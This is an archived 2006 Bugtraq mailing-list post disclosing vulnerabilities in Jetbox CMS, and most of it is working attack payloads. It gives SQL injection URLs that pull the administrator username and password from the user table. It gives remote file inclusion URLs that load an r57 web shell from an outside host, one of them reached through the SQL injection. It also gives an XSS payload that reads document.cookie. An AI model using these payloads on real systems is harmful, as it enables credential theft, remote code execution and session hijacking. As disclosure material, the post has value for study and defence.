lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: 9 Sep 2006 14:25:46 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: Multible injections and vulnerabilities in Jetbox CMS

Hello,,

Multible Injections in Jetbox CMS 

Discovered By : HACKERS PAL & mohajali
Copy rights : HACKERS PAL & mohajali
Website : http://www.soqor.net
Email Address : security@...or.net

This Contains multible injections and vulnerabilities in Jetbox CMS

/*********************************************************************/
sql injections

if magic_quotes_gpc = off

index.php?view=-1'%20union%20select%201,tablename,3,4,5,6,7,8,9,10,11,12%20from%20navigation%20where%20'1'='1

and see the error for the including
for index.php?view=-1'%20union%20select%201,login,3,4,5,6,7,8,9,10,11,12%20from%20user%20where%20uid=1/*

you will see like
Warning: main(admin) 

and index.php?view=-1'%20union%20select%201,user_password,3,4,5,6,7,8,9,10,11,12%20from%20user%20where%20uid=1/*
it will be like
Warning: main(admin1)

that means admin is the username and admin1 is the password

- - - - - - - -

index.php?view=outputs&item=-1'%20union%20SELECT%201,2,3,4,5,6,7,8,login,user_password,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20from%20user%20where%20uid=1/*

Click view source ,,
you will see somthing like this
<meta name="keywords" content="admin">
<meta name="description" content="admin1">

the first is 'admin' it's the user name for the administrator and the second is 'admin1' it's the password

/*********************************************************************/
Remote file including

includes/phpthumb.php?src=1&includes_path=http://www.soqor.net/tools/r57.txt?
includes/phpdig/includes/config.php?relative_script_path=http://www.soqor.net/tools/r57.txt?

and this sql injection can be used for file inclusion if magic_quotes_gpc = off
index.php?view=-1'%20union%20select%201,'http://www.soqor.net/tools/r57.txt?',3,4,5,6,7,8,9,10,11,12%20from%20navigation%20where%20'1'='1

/*********************************************************************/

xss are too many
Example ,,
includes/phpthumb.php?OriginalImageData=<script>alert(document.cookie);</script>

/*********************************************************************/
Full path disclore,,

Try To open any file directly by the browser

/*********************************************************************/
WwW.SoQoR.NeT

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ